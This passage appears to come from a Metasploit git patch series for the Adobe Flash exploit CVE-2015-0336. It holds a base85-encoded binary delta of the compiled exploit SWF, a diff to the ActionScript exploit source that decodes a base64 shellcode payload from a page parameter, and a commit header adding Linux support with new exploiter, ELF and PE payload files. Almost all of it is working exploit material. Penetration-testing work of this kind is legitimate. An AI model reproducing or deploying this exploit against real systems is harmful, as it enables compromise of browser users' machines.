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

diff --git a/external/source/exploits/CVE-2015-0336/Msf.as b/external/source/exploits/CVE-2015-0336/Msf.as
index bbd0d83034..fee7a99e95 100755
--- a/external/source/exploits/CVE-2015-0336/Msf.as
+++ b/external/source/exploits/CVE-2015-0336/Msf.as
@@ -32,8 +32,11 @@ package
 		private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
 		
 		public function Msf()  {
-			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
-			payload = b64.toByteArray().toString();
+			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+			var pattern:RegExp = / /g;
+			b64_payload = b64_payload.replace(pattern, "+")
+			b64.decode(b64_payload)
+			payload = b64.toByteArray().toString()
 			trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
 			
 			ba.endian = "littleEndian"

From e5d42850c1bed947659ab1f5550c58a1ea16c175 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 27 May 2015 17:05:10 -0500
Subject: [PATCH 0208/1013] Add support for Linux to CVE-2015-0336

---
 data/exploits/CVE-2015-0336/msf.swf           | Bin 18121 -> 20599 bytes
 data/exploits/CVE-2015-0336/trigger_linux.swf | Bin 0 -> 340 bytes
 external/source/exploits/CVE-2015-0336/Elf.as | 235 +++++++++++++
 .../source/exploits/CVE-2015-0336/Exploit.as  | 120 +++++++
 .../CVE-2015-0336/ExploitByteArray.as         |  82 +++++
 .../exploits/CVE-2015-0336/ExploitVector.as   |  74 ++++
 .../exploits/CVE-2015-0336/Exploiter.as       | 251 ++++++++++++++
 .../source/exploits/CVE-2015-0336/Logger.as   |  32 ++
 external/source/exploits/CVE-2015-0336/Msf.as | 321 ------------------
 external/source/exploits/CVE-2015-0336/PE.as  |  63 ++++
 .../TriggerLinux/TriggerLinux.as2proj         |  60 ++++
 .../CVE-2015-0336/TriggerLinux/src/Main.as    |  18 +
 .../adobe_flash_net_connection_confusion.rb   | 167 +++++++++
 .../adobe_flash_net_connection_confusion.rb   |   3 +
 14 files changed, 1105 insertions(+), 321 deletions(-)
 mode change 100755 => 100644 data/exploits/CVE-2015-0336/msf.swf
 create mode 100755 data/exploits/CVE-2015-0336/trigger_linux.swf
 create mode 100644 external/source/exploits/CVE-2015-0336/Elf.as
 create mode 100644 external/source/exploits/CVE-2015-0336/Exploit.as
 create mode 100644 external/source/exploits/CVE-2015-0336/ExploitByteArray.as
 create mode 100644 external/source/exploits/CVE-2015-0336/ExploitVector.as
 create mode 100644 external/source/exploits/CVE-2015-0336/Exploiter.as
 create mode 100644 external/source/exploits/CVE-2015-0336/Logger.as
 delete mode 100755 external/source/exploits/CVE-2015-0336/Msf.as
 create mode 100644 external/source/exploits/CVE-2015-0336/PE.as
 create mode 100755 external/source/exploits/CVE-2015-0336/TriggerLinux/TriggerLinux.as2proj
 create mode 100755 external/source/exploits/CVE-2015-0336/TriggerLinux/src/Main.as
 create mode 100644 modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb

diff --git a/data/exploits/CVE-2015-0336/msf.swf b/data/exploits/CVE-2015-0336/msf.swf
old mode 100755
new mode 100644
index 97b6ffe99c8b2f00fb4196a19f6bd600601dfc99..c014a3ef20856c4d1e2997a15ca1c484c113160c
GIT binary patch
delta 20478
zcmV(vK<dBAjRE(d0Sa1IQyhcK003rCu?i#se-wj<tH%&c6-Epqfm11pX3fj7G4G(Q
z82Vv~PSX+eo@b>&m1*f96Zh!4w6m5$UouaO&iV>K`rjVN2Lp)z>#C{rXOb5nAwTE=
z)$yC;ePUlrH41Vr6dmRjT#)!Y9ayl<^pY;rbNoC>H4wy623$HV%lo_L3g42dk-+QH
zf8%nihU9m8*1wPSDNp^~a7mo)O%<y+%`)*7uD-F);;uV?P1q-2qwJ+UJ&#zc7Yfn~
zgi;mD`|)rkf~j7qOJs3Cp8{#u=m2K{W;0&xqd^;+Is`Q&haDg^kQQR}PdAqBnb6(x
z4dSTG)#ZG2)5bBx)J-zA*(uY=&sHgMf3mrPoB%Mydpm(q;<Z0N<WOk)hj(44x0nmP
zDpG4#SRYBqCQur}1OoXS#V~_@P%BQ^>`lJ86I2I3@_>_DOYFK<e83xIk5(v#pdw}6
ziXtqhE-(Xx0>^SDwC9L4*R)QJzN{`Dc))baZBBf*58Qy2E|>wvGQgntyU>80e^;U*
z+A^NwgwQfPNVK3&LO7QmXLKn8k$Sq~wkq}~j?TftLz+|D%+S+LTBwJNC^2eReA2&e
zRcTHXxqmVhXp92ethPeeSuRpH;HFE-sPNriC0U$j*tGGUvL)6Z>IDonb_z9oFdBs8
znanVVln(7%d$Pf+cSMd=8RgFQe~+ckTK>j(2!J`UJ^81GLn?{BglJ-MI2@M2ro(yR
z79u57PArF4apX-wVTi!8S1liPW$u3y1kDGKClYSIOH}`G%IXoIOuy0+b4Z@ILp!hS
zt0{7!x^N|L7g1@0U(u$OZcB+92u0E;y?uB}PUFdeVrIWVu@A~Avq1=cf06L0RxrVR
z2t-@VmHt8Rl`ZHGKBF#s&s>`=@X?qkToV!=1EL(Cbk_Q}jpE90TdLnSrybu;fN=KI
zG*m<M(?2x?pC6b|{IZ$GNy?}%U!G!U!}&ooM$eSUn1KzDn<9c$MyB9PTqDUWLvvrE
zm0?&yk<?c}28W6L3_#tWe@K>jr&N(@=Zr;WeV2Whh@<7ZQDt3tq8%qOMXNI|jx1m~
zIw2gr`#S@E)j|<nuH;{InZ2!dRDBrDy*?lQI(O44Xyc1LZI>=Z8J3Ji`rZjlI~%D-
z+N|HU>FWy5m^-i@B~$pUa>AS}*amI=M7EewT`*rf6;d3fXa(}If57ozhB{tjY6v7Q
z%s+f@U#v+W4VVs4S=+WD5!L^r-(R{zN~Smj`nuZPI^sW%YM`MET9sp{%L*#JVTddl
zl{_DX<qQ6ierX;_nttG487=}YcTjxmM0W9oKQRI=qKWSpK?~{OEwdbS3`d>JH8e^P
zVN5(F)FBjZPOx<|e=9_Y&p_Jcm)a~7e;HaYe=Ku4d6hV>vhttXm>xoXGCm6edA1bG
zs7QR<c-uJ$B5PoyiAFC?0zdK_%F7n{DHu6WE75T=e{?V`^nLa7(bEl0>bv^gy$DD8
z1NEHnj$daoU(=EEfQS9w>_?)PP?5D!(+7%m1iB~vn!`r!fAtF4Dqn#+<;{IBw`LiR
zD)a6Jbaj>mv_2&`BR5SFr^pM{%B7BSaPK|Kxd>MGu@R0e6evx-V0gxh(2R+8!~DPR
zBm^5dI>+Y9x%`@8Z1eLQ5OOsi_}NXIG1B(%?G$fKU6!PUK5&wA9LIE%)l^we)uHn9
zuoDHWRkp2@e<T`uh?gnn$pQsRGpF4Fp|K^Z2Ts(H<Dcq~{09W^J_Jrc2Wek}Z^en?
z!a!d+H&s_KbzCmX67%|j2ijno3tIwYv*{q-=CVa~zt6#Yf`QZau<>Q1N8INk2-18@
z`e~e!zBQ73X_qQIVm%#qZlC7EMdi9KRl4Dt5Mzm=f5#l0<La?MKFU6)-^*im?wJd3
z2aP??nw)QEw4l>S2|eQHw>W(R@pMt<x3#EJ+LarC*3#;bIgB1G%mNG}OvK_=Mu##Q
zIt?{QpCyU>-wr5}e`r$v>&Kd{S3`QP4kJ}J0>)JW?wLikYx3v#Zc{MRxDhux+(Ao*
zepH>(f6FLzqb<t;Cz2Z4_=DZ@qCI-rP`kwSyD_9obzi+ZDI-|Q1)CmpCFdTZK+pWJ
z!+nSM!Ccx}n(~+qnhrmpqrE>E`nltf*H588|L_T&qLg@K)Iy%TJB^}0G9%?tcn6h_
z>Ypx6?9z79=6OZ@M{4p3V~)f7ZQ+mk>rv5he|$m^aO1PL;KNzDpgb?L6(<vv$vmp@
zEMwX`neVwY7xUfkT0r}P+Pq$SxRrZ*&GSBwnl_npT>TbdUFpVNdU4xrNG$A}LHb#!
z0=01<4@{rQ-TBl4N<E$(8B8|n<UhjS*x5lt)n5?T_ymmUo^DrwA!vHRHd%bovB?vE
ze-8bT9?xS}y`6fV@MSkx#^&u%34ht_`K&_xnXGMVHhWic!nk7u3wsX;A$+IOvZ(vx
zH-N#XE}{z=wkgcqMZZr}h(DsP6kNUc8g=YA##N1+&pm-I=Ux1%-a-}{3VUU3F|G_M
z_hv6guekbn470!iEjyGQvr)msTtTX4e@PKSbAkHOtat_OjtGcSSDi$}&l~RoVqQjL
z)Q0LPo9O1<DDrmc<`>0DV2(QoT*;y*?q>cZhp8?*yRZ|S-8Zj}UJAetRBalh`b3xf
zXVhn{900;)apt#|Tn%32yJAw>6BR;-fE&H&dvdgis_)n4L=?;#?PXTsDrtd0f4#(_
zNp*+g;L=?D7f*i6imv|Tp)aZhA1p~enzlNrCek#>DG;Oe7g4m7L|X=efQ6)BZuU$y
zCE=d!;gK%UN;2Z0r%#bflk-y$2hPeDv6^2HLG`5O6ldx}&7%;Rq1UnOgx}BaObPnT
z@v*!(@F+)WCFmrpjYa|so8!Mif7zuBCI(1eq&{2Ya;VFyg7Kb_>?))^k96JSICq*>
z7$}V~aMPoXJ*Y=TW)MO+iU!Z*Hgn6$URPK4xlOPS&?0*gc_Nk$EmLr7hG=FGJP-_l
zNAYT&Cjfe{_EhHT&;nHArrcaD0u{zvQt>%~kd4ZekL64bVgK<sw=mwGfAJc&%o@am
z3$;KURCM%1sd)l>*@qQIYRmb*DghcUEEdtII&<(qU(<D4^c6oV=6o58TV}ys9#|jw
zM*LPQ7$fb>3LaPsV4+J>hh;5m<d`9`qk+L;R8&iYoE@R8Q{HYpcA-Eti2#^896^h8
z<~j@ldFpT6kM{#NzOuHue}19J6uT*BXTc-;MO>@`#HV<aWyEq3kRY{ijdJr6?)MYJ
zludC=ynVA=gV?6Aqdcnxn>66Z^qSn$*5eaj7JBstR!l=)p(3y*m~D96q{88mAuEy}
z=itF!SISSL!u<he_qbBlYdEO#b&WnVY1C#z<A~)<?y>8(XEezxe@30#nMA#d-FRg~
z3B{Tyhv(Y!HNC*7TwFbC+yvo3X(7BaRD9_|5*#pl#VSx>E<%i5hVh-QDr!-rW9LAS
zE?TRZ{hHM8jLs0SOV&@(tnWs~*aGe51zRs=GB0L7lKt{G<LxU9U~tB`ZiG$l#~JgN
zE&ZpLoz1>|UxEl6f8g%f@WE1!N{r@kt5gdTG5(=|_V5MM;*gvLWWXO%1Vay|p&)!!
zEG`pKnlAIhEG5g%f4^Ec_eiBcks8b77(ZFPNJMp$V^O-H7AKC<k)ivI>BD_>#X?em
zp@#H(14{1Z8$=Ri4Mc>;_47}@i&FZ(+Dcsj)IQ(<>DC5(f3#xJQ81En)xvy`%9e?)
z!JzZasvd=bLAg1{r5YPTuXB_m2hw9D@b?urjYe|W716;{(4Ix8pjicjBp7)~J!l01
zEk!()9-z88|5xLEnwml5e6Gr=*d2*;_<!SnraNgax_rTLi3dCS!yZSCYpKKh^V6~i
zGI+W7tTy~$f2Zi$e=WyWeOi*<k%~0?t?ve$${#&YNX<qfz8eH1x3Y=9#H%N>(#}T?
z)&NBHOQ9nWM2AlUE#oL6^GF<{m~-6yHJTBqgjWGIP~6qFn&&JI=i%3-ggkg()Fvu(
z?_2hK??o-KXydc)fb)6&D{a>fnPiJ!@y6uX|6RdIe^fg<sM!k&&7FjzQ~Qw`fO)5}
zS_JO%4SU7NV9$0fRQXV$Le}Pa8Wm3@aiay#84hE;dLW9K7~tPzVafH5O8!Zb`p!&~
z^jgxfSUHm?Fdlck>UL#{ET6^6Db-apHZSF$2zF4fGKMd&uFPd$)-;V3jZvpTwjHaw
ziq&(8e`{!LB*5-5$8Vy|oDfBh!sLylfkrWT`%I~KNw~$+N3O$$GJgi?u!Uth0H&Z`
zoI;!7V;clHDe5&R1fegQrge?LF|+vxe`s|sAyG&t4V;kVPdrA*=f8qOsE)u@qu|iS
z_zxzrhCwy4N1f1&v_;)Q3KqwwZRx~X`)3nXe;e(tNx;kQny#YHgIu<)zo}ex56qgn
zwU%_r*;c0t*evhu65IzNdL06+_`@ah)<-5-u=yA&E0w*C#dPO6c_8IaBpst}f^#hR
z$lw3il^1x@{?@*rw$!INEa2G$HyJvw{q0;;*6lU2U_8Cvb`5?x)lVWml#7Q<X8d=v
zf2_~9!@wU-SAR85ZaR8r{7a$&2*h15Gd(5#2=6Y%n(hD6SB>FtFq!jcGpb?VZT36H
z;I$pB*t0^uz?7Q8?G#=ahusI_avVLoVQ5~HkuR-51p0-tL@!O7vBR?6Se~8B@s#}C
zJ|lWW2jE9VYPyUE>B|T2d6aDpFho&=f4$E)`xN3D-hN<#bF+IHLW7W>(07eH6}5iF
zPuceNzBNiPU>u8ERK9FNUwH_x3(R<E#z&^md=r*7ZJ-|W1)i0!tUkXP$LrSqSX1Y7
zX*|+PY$BI_&Cm!Rlm8u0YN=goUR{$o=DoF*Wk6)oE6#gV8zmJKuoOx=>miaze_W7P
z4Da0$GU!lT;2HmNu5XD?G`X4YuwidbFMn!_(5M(r;Mf{GZ`blR21&|>2PN!HyZ9Mk
zOt=?lr(8Q(=Y9fP(_4YLw34aL78WuOkqXiYUXen%gwLkqHu8b7b_n7dBN3RMeo*=$
zA4gb1{;wFD)9^*kcYM3)>+Fk_e?tMyJhi@c-`r~}kaxsA%77GtIYj2a@hjxX-L%MM
zcNv)qs1NU*m_z|u8ESRi$qu~<%P3SBIrUb@P$<bxE$!ZOgk{qIdtq*~n$6I+QRCoO
z2oxDX1@dz^mhEoHl5VBrC?88m!Z-s(v;D6LzSf8>)ika0OgrwgE@<U}f5o1d2(DA>
zD^ioYQ*M&EAKD5Tl;J+l6S<XO)faWdTZM-m&#yVkEHun4CSy4`=qwI~gSX<%_df@0
z#rt59=-WyWEL#GOP|ON>Mcy7LZ16HTsv5qW-J?1|NlqPc7UJ_~4*u>PdJQann?p<q
zs}eebs=qNczh57ny_uj6e`#<yizfecRzxvXZ^7X!>r^p!&r;jyPah|U9a<NPOHT1)
zYBboz?s|xN)!!H%X1y}Hsr7NzTm+eD==B2xs{>B2Tp_TONghl2)4@e{43%O$?U0&r
zWD9%j9RDzz+j1Qo5t_->VwgZ}tE{M@!KH8^4R{21%tIJ5CNVC?e@BOb!Z~aE>s;r<
z9%5O3>^s<$%yiin@m%DNDe7P#wSS%1wX<kxn50HvUD(@Y`QoB>nGQkJV6Rjf1FG0H
zVMi;$vct2GTEm|92`@rk$$p$P#Q&IffiCUj&nTIpo=b`FeN2wExG9^-kCV^UuvItD
z&eY3qXz@4<N$CK=e~yj`@~oyeK1s7T24+*s1O9cvn>)koLWrf!`O}(~P#aqHED|fO
zxe^APgN%a-BzDxpe|FOI9t7V=H73PV!An@hiO(hd#8fq4-!vws6(D)Jp8r&}3PBvK
z2WHOldD2$p;JhoJ0*N<`VUtvZ`IK6Gw6jcY+!)&Y+Pjj7e}fG?B$qw6aqKcpHFXa-
zs3M<MUK`dGJc#eO0-p>mvZKDt*b~`mGG3Ca(>y#{u216qCYM@Rj>Qv=f{zTnCmZK+
ze0j#_1uZ*sD&O^O&*_ZkLsU1~^_?0xc_H0s-miC>o&Y1l-r93>6su+hna!I|&<vw}
z0^uz34@bjnf9nG0V{28zGcmsQusfGV^{4y9`=)UhN&$VAS)~uSlJAr#hPWQ4yF~1G
zrxC>ccXWwJl$4L_gAF#ZUuL+1=jM6lcOzd%-M67J@1C>g3fW92SIk=C?;)-cx+(H5
zz7S6?_wRBq3|s&>Qe2P8HE;0V6<dQn3aBT!G{Qo#e@NfoiJ9-TL5Wr(`pRhe@gj3|
z>G+;JM_^q*M-hO=>`9O*&1aNvOi1W$Me8_1ly}PNr;MHwD)5OO9(FC1?b4yBN$gtI
z$G?W>L7n+WwbxquJ0i{|s!+|TIN9wdQju^^za5R|7>yRIGMj)!4Z3Bu%Vdsal#WXF
z;H;t5e}$)^7|oDSyBa-K9MW%`T{<{D0Pn66XY27zbuk-60Li(Gm))<k+A!|&#YxQb
zOA^Rq<=ZtSIsIYP9lq`MMt3}}^elV^TKv)sA+LHo?XlqY7oWG!dvSuhMM~;F3X!W(
z6LzIg9ohTe$0n?%1(<Q_vN2$o`#C!*Ff{O~f9=0RZS+eS7fP-WR+X#4H}xM1>$l<D
zJhKy6(*VsB;7-Iqjy<??p$^gVovmJ}oEqy(`&fX1TIO_}Jf^?7=gV-P`a|RxVbo#+
zI}e1`>cT3O5zM0yYuleg)nfRm3PqG#)2Q8sM=IjKTm-h4Z>3oA2QnUKraXyh)kINL
ze<2XIohw(~#JHP_uB1THs$9!*(77c#2$q*%OPAN)>)gJ~z_B=#m*|$1CGKo2%QPUk
zYO(J@#p*9Wmfz&(E;Q1N&KSEBM@CZ(nKkqF9^JixV-eab@kuDr2y6~;2%|a3BnNEq
zgzf?Ey2!#e62P~~Jzu`JRoryXHU1$mf4Eq3;TXFYnFOJuzG5cKqC>h6_~BS<0B`oZ
z4xoYvYRr0k;=xydu3fyV;};GY>XUeSWl<q{0_3<%alw}#4e0@k;z_Z#AG7sO>7k0p
z_H@Z~hwLL~{WV|{ws^+B@nZ&k3ih|=^Y?IgGHfv@G{u-~*vNupG>5?8xa--Yf8=qO
z9XZVFy`BNZ-6aAu#atxRkK_H@az<P^ap0(p{Pw&+{{*zQ`J}9a*nWEjc)wJ~aRJHQ
z!Tv>Ia>Zk|T$J*UB{+~|<5XV1Bqno$gq`~Wf6o9zmcsG<&TK=syjwWDo`PE3ZA7t^
z9}pSm`Hd4w3!-<~dotR;{0ghoe|I|r(K1Lt+x_?bIt#^v<adU7wN0XHaO7v_t9N-w
z;S(#gCy~g(vz`{yUy#_dE9;4{o}_nK2&c&4I|pfCuc}RvAtuNHeWkHs2WNFE{i7f@
zZ0Ao}3?tiI=;*jLb6Ru-Z02HH$v|8dVn5fx@2tV{YjhJFF!u&iehT@-e`bBPUQ7m=
zQjtRUnnb4y9*K8SJZ6dUq#$D8Wl1lxUnB7fQfZ6q6a!e4b7o8<xMt)9n+Bpp>E}KU
zLe@Cjzl1K2qj+@iufD>OTm)b3>_&$t6F&SIc_OG$Dq1k1$=r|OxAEwP!67WfyO={=
zN=@Ya^?ihWI#Q+Ykmt?mf1ZyECQ6z5`a+sx4{WHPfCjwtt*pBYHUdAM^WfVAF@Pz8
zo@`%%|A%m{-IJ;uB_`@X?q*Lg*K(p4_1ed(W<Uz(f-;&19wfXGSH<?lg#I>66inAz
zMQuoZP_}fcBS>*D|Gyf*XD3f4_}Z1tRef9#qQiTS;y3L$J6D>%f0^d;oL7)2T!%@f
z7aJzdF_b;gRbg#N<>|#G^)d6Rq_ltQN*;y}j2WR?!5b63lvVp7qqkvYB|rX4otsT1
zo)@|sdZ`)<6_98nXmLiTqJMG2dV5c?4e#>Rn}F0(T8Pf+iT+ra)ogYbM5qhRV<5`0
z|Bw0YIz8Q{^VZ%Wf2{<H>~LGwN}=(Gq>&j^Zd-?0a@_FBY3wzuSfFXHj2sA5oKiSx
z^c2grChbZw^U7RTnjz-1S;2UVpl2mHyYE6CNgCQ1xQ2SL_O;z)&+4~97XTvxyOg6s
zGi8w6#OfmVdnn#aUeVsWCf7NiGk8suBO}JySE2mh(1Yy<fAj9nLjmFZVg)}YolL`_
zqNt+qJBm|aa7o2PrUR3a{rNYPC^Eu13$@lS*(qd+5<u9I)i#NcAC_hKuD|#Ap@*>=
zWsVF7Z7_>1KMOE+Qg>j%R=X4S^1N;S?vQXQKmWuutWpuDc?oKz9vfi2Wj#ZCG3#C`
z0Mf*P<hn|Ue^my^_=Q+d7y!y&B_63}uT5&)zWcmkigvdvCV9ayl|OgehS6F{H-7t#
zqry-c-uQayMtc;`FxFP)$oKiz+5nV7NgBxL02+%9`CwEOh=erpPN%@Do>!tEFHl&M
zTjUD}NX43F$wSn;TC@s)mjOQE8;x{?EAkXs=Kz`Jf6GvxHsOU;%h_RNuEwA7BZlKG
